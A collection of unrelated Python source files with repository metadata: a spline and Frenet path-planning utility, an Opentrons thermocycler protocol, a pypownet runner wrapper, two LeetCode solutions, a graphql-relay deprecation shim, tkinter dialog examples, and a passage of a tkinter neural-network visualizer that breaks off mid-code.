3.0\n\n return position\n\n def calc_first_derivative(self, x):\n \"\"\"\n Calc first derivative at given x.\n if x is outside the input x, return None\n Returns\n -------\n dy : float\n first derivative for given x.\n \"\"\"\n\n if x < self.x[0]:\n return None\n elif x > self.x[-1]:\n return None\n\n i = self.__search_index(x)\n dx = x - self.x[i]\n dy = self.b[i] + 2.0 * self.c[i] * dx + 3.0 * self.d[i] * dx ** 2.0\n\n return dy\n\n def calc_second_derivative(self, x):\n \"\"\"\n Calc second derivative at given x.\n if x is outside the input x, return None\n Returns\n -------\n ddy : float\n second derivative for given x.\n \"\"\"\n\n if x < self.x[0]:\n return None\n elif x > self.x[-1]:\n return None\n\n i = self.__search_index(x)\n dx = x - self.x[i]\n ddy = 2.0 * self.c[i] + 6.0 * self.d[i] * dx\n\n return ddy\n\n def __search_index(self, x):\n \"\"\"\n search data segment index\n \"\"\"\n return bisect.bisect(self.x, x) - 1\n\n def __calc_A(self, h):\n \"\"\"\n calc matrix A for spline coefficient c\n \"\"\"\n A = np.zeros((self.nx, self.nx))\n A[0, 0] = 1.0\n for i in range(self.nx - 1):\n if i != (self.nx - 2):\n A[i + 1, i + 1] = 2.0 * (h[i] + h[i + 1])\n A[i + 1, i] = h[i]\n A[i, i + 1] = h[i]\n\n A[0, 1] = 0.0\n A[self.nx - 1, self.nx - 2] = 0.0\n A[self.nx - 1, self.nx - 1] = 1.0\n\n return A\n\n def __calc_B(self, h, a):\n \"\"\"\n calc matrix B for spline coefficient c\n \"\"\"\n B = np.zeros(self.nx)\n for i in range(self.nx - 2):\n B[i + 1] = 3.0 * (a[i + 2] - a[i + 1]) / h[i + 1]\\\n - 3.0 * (a[i + 1] - a[i]) / h[i]\n\n return B\n\nclass CubicSpline2D:\n \"\"\"\n Cubic CubicSpline2D class\n Parameters\n ----------\n x : list\n x coordinates for data points.\n y : list\n y coordinates for data points.\n \"\"\"\n\n 
def __init__(self, x, y):\n self.s = self.__calc_s(x, y)\n self.sx = CubicSpline1D(self.s, x)\n self.sy = CubicSpline1D(self.s, y)\n\n def __calc_s(self, x, y):\n dx = np.diff(x)\n dy = np.diff(y)\n self.ds = np.hypot(dx, dy)\n s = [0]\n s.extend(np.cumsum(self.ds))\n\n return s\n\n def calc_position(self, s):\n \"\"\"\n calc position\n Parameters\n ----------\n s : float\n distance from the start point. if `s` is outside the data point's\n range, return None.\n Returns\n -------\n x : float\n x position for given s.\n y : float\n y position for given s.\n \"\"\"\n x = self.sx.calc_position(s)\n y = self.sy.calc_position(s)\n\n return x, y\n\n def calc_curvature(self, s):\n \"\"\"\n calc curvature\n Parameters\n ----------\n s : float\n distance from the start point. if `s` is outside the data point's\n range, return None.\n Returns\n -------\n k : float\n curvature for given s.\n \"\"\"\n dx = self.sx.calc_first_derivative(s)\n ddx = self.sx.calc_second_derivative(s)\n dy = self.sy.calc_first_derivative(s)\n ddy = self.sy.calc_second_derivative(s)\n k = (ddy * dx - ddx * dy) / ((dx ** 2 + dy ** 2)**(3 / 2))\n\n return k\n\n def calc_yaw(self, s):\n \"\"\"\n calc yaw\n Parameters\n ----------\n s : float\n distance from the start point. if `s` is outside the data point's\n range, return None.\n Returns\n -------\n yaw : float\n yaw angle (tangent vector) for given s.\n \"\"\"\n dx = self.sx.calc_first_derivative(s)\n dy = self.sy.calc_first_derivative(s)\n yaw = math.atan2(dy, dx)\n\n return yaw\n\nclass FrenetPath:\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\nclass QuinticPolynomial:\n def __init__(self, xs, vxs, axs, xe, vxe, axe, time):\n self.a0 = xs\n self.a1 = vxs\n self.a2 = axs / 2.0\n\n A = np.array([[time ** 3, time ** 4, time ** 5],\n [3 * time ** 2, 4 * time ** 3, 5 * time ** 4],\n [6 * time, 12 * time ** 2, 20 * time ** 3]])\n b = np.array([xe - self.a0 - self.a1 * time - self.a2 * time ** 2,\n vxe - self.a1 - 2 * self.a2 * time,\n axe - 2 * self.a2])\n x = np.linalg.solve(A, b)\n\n self.a3 = x[0]\n self.a4 = x[1]\n self.a5 = x[2]\n\n def calc_point(self, t):\n xt = self.a0 + self.a1 * t + self.a2 * t ** 2 + \\\n self.a3 * t ** 3 + self.a4 * t ** 4 + self.a5 * t ** 5\n\n return xt\n\n def calc_first_derivative(self, t):\n xt = self.a1 + 2 * self.a2 * t + \\\n 3 * self.a3 * t ** 2 + 4 * self.a4 * t ** 3 + 5 * self.a5 * t ** 4\n\n return xt\n\n def calc_second_derivative(self, t):\n xt = 2 * self.a2 + 6 * self.a3 * t + 12 * self.a4 * t ** 2 + 20 * self.a5 * t ** 3\n\n return xt\n\n def calc_third_derivative(self, t):\n xt = 6 * self.a3 + 24 * self.a4 * t + 60 * self.a5 * t ** 2\n\n return xt\n\n\nclass CubicPolynomial:\n def __init__(self, vxs, axs, vxe, axe, time):\n self.a0 = vxs\n self.a1 = axs\n\n A = np.array([[time ** 2, time ** 3],\n [2 * time, 3 * time ** 2]])\n b = np.array([vxe - self.a0 - self.a1 * time,\n axe - self.a1])\n x = np.linalg.solve(A, b)\n\n self.a2 = x[0]\n self.a3 = x[1]\n\n def calc_point(self, t):\n xt = self.a0 + self.a1 * t + self.a2 * t ** 2 + self.a3 * t ** 3\n\n return xt\n\n def calc_first_derivative(self, t):\n xt = self.a1 + 2 * self.a2 * t + 3 * self.a3 * t ** 2\n\n return xt\n\n def calc_second_derivative(self, t):\n xt = 2 * self.a2 + 6 * self.a3 * t\n\n return xt\n\ndef generate_target_course(x, 
y):\n csp = CubicSpline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n\n return rx, ry, ryaw, rk, csp\n\ndef wrap_to_pi(theta):\n return (theta+np.pi) % (2*np.pi) - np.pi\n\ndef generate_lon_profile(v_s, a_s, acc): \n v_target = np.clip(v_s + acc * 3, 0, 16)\n if acc != 0:\n t_target = round((v_target - v_s) / acc, 3)\n t_target = np.clip(t_target, 0.1, 3)\n else:\n t_target = 3\n\n T = np.arange(0, t_target, 0.1)\n lon_profile = CubicPolynomial(v_s, a_s, v_target, 0, t_target)\n speed = [lon_profile.calc_point(t) for t in T]\n\n if len(speed) < 30:\n speed.extend([speed[-1] for _ in range(30-len(speed))])\n \n speed = np.clip(speed, 0.01, 16)\n displacement = np.cumsum(speed * 0.1)\n\n return speed, displacement \n\ndef generate_lat_profile(d, v_d):\n d_target = 0\n t_target = np.clip(np.abs(d - d_target) / 1.5, 0.1, 3)\n T = np.arange(0.1, t_target+0.1, 0.1) \n lat_profile = QuinticPolynomial(d, v_d, 0, d_target, 0, 0, t_target)\n displacement = [lat_profile.calc_point(t) for t in T]\n speed = [lat_profile.calc_first_derivative(t) for t in T]\n \n if len(speed) < 30:\n speed.extend([speed[-1] for _ in range(30-len(speed))])\n displacement.extend([displacement[-1] for _ in range(30-len(displacement))])\n\n return speed, displacement","repo_name":"MCZhi/Predictive-Decision","sub_path":"planner_utils.py","file_name":"planner_utils.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"7"} +{"seq_id":"27761495847","text":"from opentrons import protocol_api\r\n\r\nmetadata = {'apiLevel': '2.2',\r\n 'protocolName': 'Thermocycle template (optional)',\r\n 'author': 'Gabrielle Johnston',\r\n 'description': 'Optional thermocycle template for after clip'}\r\n\r\n\r\ndef run(protocol: protocol_api.ProtocolContext):\r\n\r\n def thermocycler(well_plate_type='biorad_96_wellplate_200ul_pcr'):\r\n\r\n protocol.comment('Insert the thermocycler module to the opentrons.')\r\n protocol.comment(\r\n 'Place the clip reaction plate in the opentrons module')\r\n tc_mod = protocol.load_module('thermocycler')\r\n tc_mod.open_lid()\r\n clip_plate = tc_mod.load_labware(well_plate_type)\r\n\r\n tc_mod.close_lid()\r\n profile1 = [\r\n {'temperature': 37, 'hold_time_seconds': 120},\r\n {'temperature': 20, 'hold_time_seconds': 60}]\r\n profile2 = [\r\n {'temperature': 50, 'hold_time_seconds': 300},\r\n {'temperature': 80, 'hold_time_seconds': 1200}]\r\n\r\n tc_mod.execute_profile(steps=profile1, repetitions=20)\r\n tc_mod.execute_profile(steps=profile2, repetitions=1)\r\n tc_mod.open_lid()\r\n protocol.comment(\r\n 'Remove the clip reaction plate and proceed with purification.')\r\n tc_mod.deactivate()\r\n\r\n thermocycler()\r\n
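\r\n # Editor's note: a different plate can be passed explicitly, e.g. (assuming\r\n # that labware definition is available on the robot):\r\n # thermocycler(well_plate_type='nest_96_wellplate_100ul_pcr_full_skirt')\r\n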
","repo_name":"Imperial-iGEM/DJANGO-Assembly-Methods","sub_path":"basic_assembly/dna_bot/template_ot2_scripts/thermocycle_template.py","file_name":"thermocycle_template.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"1274884374","text":"import numpy as np\nfrom pypownet.runner import Runner\n\n\nclass WrappedRunner(Runner):\n def __init__(self, environment, agent, render=False, verbose=False, vverbose=False, parameters=None, level=None,\n max_iter=None, log_filepath='runner.log', machinelog_filepath='machine_logs.csv'):\n super().__init__(environment, agent, render, verbose, vverbose, parameters, level, max_iter, log_filepath,\n machinelog_filepath)\n\n def step(self, observation):\n \"\"\"\n Performs a full RL step: the agent acts given an observation, receives and processes the reward, and the env is\n reset if done was returned as True; this also logs the variables of the system including actions,\n observations.\n :param observation: input observation to be given to the agent\n :return: (new observation, action taken, reward received)\n \"\"\"\n action = self.agent.act(observation)\n\n # Update the environment with the chosen action\n observation, reward_aslist, done, info = self.environment.step(action, do_sum=False)\n if done:\n observation = self.environment.process_game_over()\n elif info:\n self.logger.warning(info.text)\n\n reward = sum(reward_aslist)\n\n if self.render:\n self.environment.render()\n\n self.agent.feed_reward(action, observation, reward_aslist)\n\n return observation, action, reward, reward_aslist, done, info\n\n def loop(self, iterations, epochs=1):\n \"\"\"\n Runs the simulator for the given number of iterations times the number of episodes.\n :param iterations: int of number of iterations per episode\n :param epochs: int of number of episodes, each resetting the environment at the beginning\n :return:\n \"\"\"\n cumul_rew = 0.0\n dones = []\n infos = []\n for i_episode in range(epochs):\n observation = self.environment.process_game_over()\n for i in range(1, iterations + 1):\n (observation, action, reward, reward_aslist, done, info) = self.step(observation)\n cumul_rew += reward\n dones.append(done)\n infos.append(info)\n\n return cumul_rew, dones, infos\n\n\ndef get_verbose_node_topology(obs, action_space):\n \"\"\"This function returns the topology, i.e., split nodes are displayed\"\"\"\n n_bars = len(action_space.substations_ids)\n # The following code allows to get just the nodes ids\n # where there are elements connected. It also considers\n # the split node action.\n all_sub_conf = []\n for sub_id in obs.substations_ids:\n sub_conf, _ = obs.get_nodes_of_substation(sub_id)\n all_sub_conf.append(sub_conf)\n\n nodes_ids = np.arange(1, n_bars + 1)\n for i in range(len(all_sub_conf)):\n # Check if all elements in sub (i) are connected to busbar B1.\n # print(np.equal(all_sub_conf[i], np.ones(len(all_sub_conf[i]))))\n # print(\"np.ones(len(all_sub_conf[i] = \", np.ones(len(all_sub_conf[i])))\n # print(\"type = \", type(np.equal(all_sub_conf[i], np.ones(len(all_sub_conf[i])))))\n if (np.equal(all_sub_conf[i], np.ones(len(all_sub_conf[i])))).all():\n # Remove the existing node.\n nodes_ids = np.delete(nodes_ids, i)\n # And create a new node.\n nodes_ids = np.append(nodes_ids, int(str(666) + str(i + 1)))\n # Check if one or more elements\n # are connected to busbar B1.\n elif np.sum(all_sub_conf[i]) > 0:\n nodes_ids = np.append(nodes_ids, int(str(666) + str(i + 1)))\n\n nodes_ids = list(nodes_ids)\n\n for node in obs.substations_ids:\n conf = obs.get_nodes_of_substation(node)\n # print(f\"node [{node}] config = {conf}\")\n # print(f\"func: get_verbose_topo: node [{node}]\")\n ii = 0\n for elem, type in zip(conf[0], conf[1]):\n # print(f\"element n°[{ii}] connected to BusBar n°[{elem}] is a [{type}]\")\n ii += 1\n return list(nodes_ids)","repo_name":"MarvinLer/pypownet","sub_path":"tests/common_assets.py","file_name":"common_assets.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"7"} +{"seq_id":"37729129533","text":"# https://leetcode.com/problems/find-the-index-of-the-first-occurrence-in-a-string/\n\nclass Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n \"\"\"\n Logic: Take the length of needle and loop through \n each position of haystack and find if it matches\n \n Time: O(n)\n Space: O(1)\n \"\"\"\n # Base case: needle is empty, no need to find\n if not needle: return 0\n \n n = len(needle)\n \n for i in range(len(haystack)):\n if haystack[i:i+n] == needle:\n return i\n \n return -1\n
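\n\n# Editor's note: quick usage sketch (illustrative):\n# assert Solution().strStr(\"sadbutsad\", \"sad\") == 0   # first occurrence wins\n# assert Solution().strStr(\"leetcode\", \"leeto\") == -1  # no match anywhere\n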
","repo_name":"hanelliotn/leetcode","sub_path":"00028-FindTheIndexOfTheFirstOccurrenceInAString.py","file_name":"00028-FindTheIndexOfTheFirstOccurrenceInAString.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"1336019863","text":"import warnings\n\n# noinspection PyDeprecation\nfrom .array_connection import (\n connection_from_array,\n connection_from_array_slice,\n cursor_for_object_in_connection,\n cursor_to_offset,\n get_offset_with_default,\n offset_to_cursor,\n SizedSliceable,\n)\n\n# Deprecated functions from older graphql-relay-py versions\n# noinspection PyProtectedMember,PyUnresolvedReferences,PyDeprecation\nfrom .array_connection import ( # noqa: F401\n connection_from_list,\n connection_from_list_slice,\n)\n\nwarnings.warn(\n \"The 'arrayconnection' module is deprecated. \"\n \"Functions should be imported from the top-level package instead.\",\n DeprecationWarning,\n stacklevel=2,\n)\n\n__all__ = [\n \"connection_from_array\",\n \"connection_from_array_slice\",\n \"cursor_for_object_in_connection\",\n \"cursor_to_offset\",\n \"get_offset_with_default\",\n \"offset_to_cursor\",\n \"SizedSliceable\",\n]\n","repo_name":"iyushaw/Fastapi_Docker_Dev","sub_path":"env/lib/python3.8/site-packages/graphql_relay/connection/arrayconnection.py","file_name":"arrayconnection.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"44961581900","text":"from tkinter import *\nfrom tkinter.messagebox import *\n\n# the askquestion dialog offers Yes or No, the close button is inactive; returns 'yes' or 'no'\ndef ask_question(event):\n answer = askquestion('AskQuestion', 'First question?')\n label1.configure(text=answer)\n\n# the askokcancel dialog offers OK or Cancel; returns 1 or 0\ndef ask_ok(event):\n answer = askokcancel('AskOkCancel', 'Second question?')\n label2.configure(text=answer)\n\n# the askyesno dialog offers Yes or No; returns 1 or 0\ndef ask_yesno(event):\n answer = askyesno('AskYesNo', 'Third question?')\n label3.configure(text=answer)\n\n# the askretrycancel dialog offers Retry or Cancel; returns 1 or 0\ndef ask_rc(event):\n answer = askretrycancel('AskRetryCancel', 'Fourth question?')\n label4.configure(text=answer)\n\nroot = Tk()\nroot.title('Dialog windows_2')\n\nbtn1 = Button(root, text='askquestion', font=('Calibri', 20), width=12)\nbtn1.grid(row=0, column=0, sticky='ew')\nlabel1 = Label(root, font=('Calibri', 20), width=12)\nlabel1.grid(row=0, column=1)\nbtn1.bind(\"<Button-1>\", ask_question)\n\nbtn2 = Button(root, text='askokcancel', font=('Calibri', 20), width=12)\nbtn2.grid(row=1, column=0, sticky='ew')\nlabel2 = Label(root, font=('Calibri', 20), width=12)\nlabel2.grid(row=1, column=1)\nbtn2.bind(\"<Button-1>\", ask_ok)\n\nbtn3 = Button(root, text='askyesno', font=('Calibri', 20), width=12)\nbtn3.grid(row=2, column=0, sticky='ew')\nlabel3 = Label(root, font=('Calibri', 20), width=12)\nlabel3.grid(row=2, column=1)\nbtn3.bind(\"<Button-1>\", ask_yesno)\n\nbtn4 = Button(root, text='askretrycancel', font=('Calibri', 20), width=12)\nbtn4.grid(row=3, column=0, sticky='ew')\nlabel4 = Label(root, font=('Calibri', 20), width=12)\nlabel4.grid(row=3, column=1)\nbtn4.bind(\"<Button-1>\", ask_rc)\n\nroot.mainloop()\n","repo_name":"mikibouns/Tkinter","sub_path":"tkinter_lesson_ДиалоговыеОкна_13.py","file_name":"tkinter_lesson_ДиалоговыеОкна_13.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22349425606","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n dummy = ListNode()\n curr = dummy\n # edge case\n if not list1:\n return list2\n if not list2:\n return list1\n while list1 and list2:\n if list1.val <= list2.val:\n curr.next = list1\n list1 = list1.next\n else:\n curr.next = list2\n list2 = list2.next\n curr = curr.next\n # gather the remaining elements in l1 and l2\n if list1:\n curr.next = list1\n elif list2:\n curr.next = list2\n return dummy.next\n \n## Time Complexity: O(N)\n## Space Complexity: O(1)","repo_name":"priyanka-asnani/Leetcode-Problems","sub_path":"Linked List/21. 
Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43438971808","text":"import math\r\nimport random\r\nimport time\r\nimport cv2\r\nimport math\r\nfrom tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Neural Network\")\r\n\r\nwindow_width=600\r\nwindow_height=750\r\ncanvas = Canvas(root, width=window_width, height=window_height, background=\"black\")\r\ncanvas.grid()\r\n\r\ndef der_sig(x):\r\n return sig(x) * (1 - sig(x))\r\n\r\n\r\ndef sig(x):\r\n val = 1 / (1 + 1 / pow(math.e, x))\r\n return val\r\n\r\n\r\n'''\r\ndef der_sig(x):\r\n return 1.0/(1+pow(math.e, -x))\r\n\r\n\r\ndef sig(x):\r\n return math.log((1+pow(math.e, x)))\r\n\r\ndef der_sig(x):\r\n return -1.0*2.0*x/(x**2+1)**2\r\ndef sig(x):\r\n return 1.0/(x**2+1)\r\n\r\n\r\ndef der_sig(x):\r\n if x == 0:\r\n return 0\r\n else:\r\n return math.cos(x)/x-math.sin(x)/(x**2)\r\n\r\ndef sig(x):\r\n if x == 0:\r\n return 1\r\n else:\r\n return math.sin(x)/x\r\n'''\r\nmse = 0\r\nepochs = 0\r\nlearning_rate = 0.5\r\nmomentum = 0.1\r\n\r\nNN_window_x1 = 100\r\nNN_window_x2 = 500\r\n\r\nNN_window_y1 = 50\r\nNN_window_y2 = window_height-50\r\n\r\nnum_layers = 3\r\n\r\ninputs = [[0], [0.1],[0.2],[0.3],[0.4],[0.5],[0.6],[0.7],[0.8],[0.9],[1]]\r\nexpected = [[0,0,0,0],[0,0,0,1],[0,0,1,0],[0,0,1,1],[0,1,0,0],[0,1,0,1],[0,1,1,0],[0,1,1,1],[1,0,0,0],[1,0,0,1],[1,0,1,0]]\r\nnewinput = [[0.25]]\r\n\r\n#inputs = [[0], [0.1],[0.2],[0.3],[0.4],[0.5],[0.6],[0.7]]\r\n#expected = [[0,0,0],[0,0,1],[0,1,0],[0,1,1],[1,0,0],[1,0,1],[1,1,0],[1,1,1]]\r\n#newinput = [[0.25]]\r\n\r\n#inputs = [[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]]\r\n#expected = [[0, 0, 1], [0, 1, 0], [0, 1, 1], [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1], [0, 0, 0]]\r\n#newinput = [[0, 0, 0]]\r\n\r\n\r\n#inputs = [[0,0], [0,1],[1,0],[1,1]]\r\n#expected = [[0],[1],[1],[0]]\r\n#newinput = [[0,1]]\r\n\r\n#inputs = [[0,0,0],[0,0,1],[0,1,0],[0,1,1],[1,0,0],[1,0,1],[1,1,0],]\r\n#expected = [[0,1],[1,0],[1,1],[0,0],[0,1],[1,0],[1,1],[0,0]]\r\n#newinput = [[0,0,0]]\r\n\r\n#inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]\r\n#expected = [[0,0], [1,0], [1,0], [0, 1]]\r\n#newinput = [[1, 1]]\r\n\r\n\r\ninputs = [[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0], [0, 0, 1, 1], [0, 1, 0, 0], [0, 1, 0, 1], [0, 1, 1, 0], [0, 1, 1, 1], \\\r\n [1, 0, 0, 0], [1, 0, 0, 1], [1, 0, 1, 0], [1, 0, 1, 1], [1, 1, 0, 0], [1, 1, 0, 1], [1, 1, 1, 0], [1, 1, 1, 1]]\r\nexpected = [ [0, 0, 0, 1], [0, 0, 1, 0], [0, 0, 1, 1], [0, 1, 0, 0], [0, 1, 0, 1], [0, 1, 1, 0], [0, 1, 1, 1], \\\r\n [1, 0, 0, 0], [1, 0, 0, 1], [1, 0, 1, 0], [1, 0, 1, 1], [1, 1, 0, 0], [1, 1, 0, 1], [1, 1, 1, 0],[1, 1, 1, 1],[0, 0, 0, 0]]\r\n\r\nnewinput = [[1, 0, 0, 0]]\r\n\r\n\r\nl1 = len(inputs[0])\r\n\r\nl2 = 10\r\n\r\nl3 = len(expected[0])\r\n\r\nwidths = [l1, l2, l3]\r\n\r\ndef create_circle(x, y, r, **kwargs):\r\n canvas.create_oval(x - r, y - r, x + r, y + r, **kwargs)\r\n\r\n\r\nclass Neuron:\r\n num_neurons = 0\r\n\r\n def __init__(self, layer, neuron_number):\r\n self.name = \"inited\"\r\n self.layer = layer\r\n self.neuron_num = neuron_number\r\n self.dendrites = [] # list of connections\r\n self.sum = 0\r\n self.sumout = 0\r\n self.delta = 0\r\n Neuron.num_neurons += 1\r\n\r\n self.graphic_prop = Graphic_prop(0, 0)\r\n\r\n def init_graphic(self):\r\n self.graphic_prop.x1 = NN_window_x1 + (NN_window_x2 - NN_window_x1) * (self.layer-1) / 
(num_layers-1)\r\n self.graphic_prop.y1 = NN_window_y1 + (NN_window_y2 - NN_window_y1) * self.neuron_num / (widths[self.layer-1])\r\n create_circle(self.graphic_prop.x1, self.graphic_prop.y1, 15, fill=\"#BBB\", outline=\"\")\r\n canvas.create_text(self.graphic_prop.x1, self.graphic_prop.y1+15, text=\"{}\".format(self.delta), anchor=N,\r\n fill='white')\r\n\r\n #canvas.update()\r\n\r\n def activation_fn(self):\r\n # self.sumout = 1 / (1 + pow(math.e, -self.sum))\r\n self.sumout = sig(self.sum)\r\n\r\n def summer(self):\r\n self.name = \"summing\"\r\n self.sum = 0\r\n for conn in self.dendrites:\r\n self.sum += conn.output # output after applying weights\r\n Neuron.activation_fn(self)\r\n # print(\"layer : {0} sumout : {1}\".format(self.layer, self.sumout))\r\n\r\n def num_dendrites(self):\r\n return len(self.dendrites)\r\n\r\n\r\nclass Connection:\r\n num_connections = 0\r\n max_weight = 1\r\n min_weight = 0\r\n\r\n max_weight_wip = 1 #wt with ip\r\n min_weight_wip = -1\r\n\r\n wip = False\r\n\r\n def __init__(self, prev_neuron, next_neuron, layer):\r\n self.weight = random.uniform(Connection.min_weight, Connection.max_weight)\r\n #print(self.weight)\r\n self.prev_neuron = prev_neuron\r\n self.sum = 0\r\n self.output = 0\r\n self.gradient = 0\r\n self.prev_gradient = 0\r\n self.del_weight = 0\r\n self.sum_del_weight = 0\r\n self.prev_del_weight = 0\r\n next_neuron.dendrites.append(self)\r\n self.next_neuron_graphic_prop = next_neuron.graphic_prop\r\n self.layer = layer\r\n Connection.num_connections += 1\r\n\r\n # graphic prop\r\n self.graphic_prop = Graphic_prop(0, 0)\r\n\r\n def init_graphic(self):\r\n r = 20\r\n w = 2\r\n if self.wip:\r\n\r\n if self.output < 0:\r\n g = 20\r\n r = int((self.output - Connection.min_weight_wip) * (160 - 100) / (Connection.max_weight_wip - Connection.min_weight_wip) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(0.8*r), int(g), int(0.2 * g))\r\n else:\r\n r = 50\r\n g = int((self.output - Connection.min_weight_wip) * (175 - 100) / (Connection.max_weight_wip - Connection.min_weight_wip) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(0.3 * r), int(g), int(0.4 * g))\r\n if self.output == 0:\r\n r=130\r\n tk_rgb = \"#%02x%02x%02x\" % (50,50,50)\r\n else:\r\n if self.weight < 0:\r\n g = 20\r\n r = int((self.output - Connection.min_weight) * (160 - 100) / (Connection.max_weight - Connection.min_weight) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(r*0.9), g, int(0.2 * g))\r\n else:\r\n r = 50\r\n g = int((self.weight - Connection.min_weight) * (170 - 100) / (Connection.max_weight - Connection.min_weight) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(0.2 * r), g, int(0.2 * g))\r\n if self.weight == 0:\r\n r=130\r\n tk_rgb = \"#%02x%02x%02x\" % (50,40,40)\r\n #(x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min;\r\n #print(g)\r\n\r\n\r\n if g>135 or r>115:\r\n w=3\r\n if g>145 or r>125:\r\n w=4\r\n if g>155 or r>135:\r\n w=5\r\n if g>165 or r>145:\r\n w=6\r\n\r\n canvas.create_line(self.prev_neuron.graphic_prop.x1, self.prev_neuron.graphic_prop.y1,\\\r\n self.next_neuron_graphic_prop.x1, self.next_neuron_graphic_prop.y1, width=w, fill=tk_rgb)\r\n #canvas.update()\r\n\r\n def apply_weight(self):\r\n self.output = self.prev_neuron.sumout * self.weight\r\n if Connection.max_weight < self.weight:\r\n Connection.max_weight = self.weight\r\n else:\r\n if Connection.min_weight > self.weight:\r\n Connection.min_weight = self.weight\r\n if Connection.max_weight_wip < self.output:\r\n Connection.max_weight_wip = self.output\r\n else:\r\n if Connection.min_weight_wip > 
self.output:\r\n Connection.min_weight_wip = self.output\r\n # print(\"{0}*{1}={2}:\".format(self.prev_neuron.sumout,self.weight,self.output))\r\n\r\n\r\nclass Graphic_prop:\r\n def __init__(self, x1, y1):\r\n self.x1 = x1\r\n self.y1 = y1\r\n self.x2 = 0\r\n self.y2 = 0\r\n self.color = Graphic_prop.rgb_to_hex(255, 255, 255)\r\n\r\n @staticmethod\r\n def rgb_to_hex(r, g, b):\r\n return '#%02x%02x%02x' % (r, g, b)\r\n\r\n\r\nconn_layer1 = []\r\nconn_layer2 = []\r\nconn_layer3 = []\r\n\r\nconns = []\r\n\r\ni = 0\r\nj = 0\r\n\r\nLayer1 = [Neuron(1, i) for i in range(0, l1)]\r\nLayer2 = [Neuron(2, i) for i in range(0, l2)]\r\nLayer3 = [Neuron(3, i) for i in range(0, l3)]\r\n\r\n\r\nfor i in range(l1):\r\n for j in range(l2):\r\n conn_layer1.append(Connection(Layer1[i], Layer2[j], 1))\r\nfor i in range(l2):\r\n for j in range(l3):\r\n conn_layer2.append(Connection(Layer2[i], Layer3[j], 2))\r\n\r\n#for i in range(l3):\r\n# conn_layer3.append(Connection(Layer3[i], Layer1[i]))\r\n# conn_layer3[i].weight = 1\r\n\r\n\r\ndef redraw_del():\r\n canvas.delete(ALL)\r\n\r\n for i in range(0, l1):\r\n Layer1[i].init_graphic()\r\n\r\n for i in range(0, l2):\r\n Layer2[i].init_graphic()\r\n\r\n for i in range(0, l3):\r\n Layer3[i].init_graphic()\r\n\r\n for i in range(len(conn_layer1)):\r\n\r\n conn_layer1[i].apply_weight()\r\n for i in range(len(conn_layer1)):\r\n conn_layer1[i].init_graphic()\r\n time.sleep(0.1)\r\n canvas.update()\r\n\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].apply_weight()\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].init_graphic()\r\n\r\n time.sleep(0.1)\r\n canvas.update()\r\n\r\n\r\ndef redraw(ip=-1):\r\n canvas.delete(ALL)\r\n\r\n for i in range(len(conn_layer1)):\r\n conn_layer1[i].init_graphic()\r\n\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].init_graphic()\r\n\r\n for i in range(0, l1):\r\n Layer1[i].init_graphic()\r\n\r\n for i in range(0, l2):\r\n Layer2[i].init_graphic()\r\n\r\n for i in range(0, l3):\r\n Layer3[i].init_graphic()\r\n\r\n canvas.create_text(50, window_height-50, text=\"MSE: {}\".format(mse), anchor=SW, fill='white')\r\n canvas.create_text(50, window_height-25, text=\"Epochs: {}\".format(epochs), anchor=SW, fill='white')\r\n\r\n if ip >= 0:\r\n for i in range(0, l1):\r\n x1 = NN_window_x1 - 30\r\n y1 = NN_window_y1 + (NN_window_y2 - NN_window_y1) * i / (widths[0])\r\n canvas.create_text(x1, y1, text=\"{}\".format(inputs[ip][i]), anchor=SW, fill='white')\r\n for i in range(0, l3):\r\n x1 = NN_window_x2 + 30\r\n y1 = NN_window_y1 + (NN_window_y2 - NN_window_y1) * i / (widths[2])\r\n canvas.create_text(x1, y1, text=\"{0:.2f}\".format(Layer3[i].sumout,2), anchor=SW, fill='white')\r\n\r\n canvas.update()\r\n\r\n\r\ndef feed_forward():\r\n # print(\" \")\r\n # print(\" \")\r\n for i in range(len(conn_layer1)):\r\n 